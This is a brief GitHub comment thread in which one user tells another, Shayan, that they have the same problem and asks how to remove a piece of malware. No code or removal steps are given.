This comment has been minimized.

Copy link

kazemimehdi commented Jul 4, 2015

Hi Shayan,
I have the same problem. How do you remove that malware?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.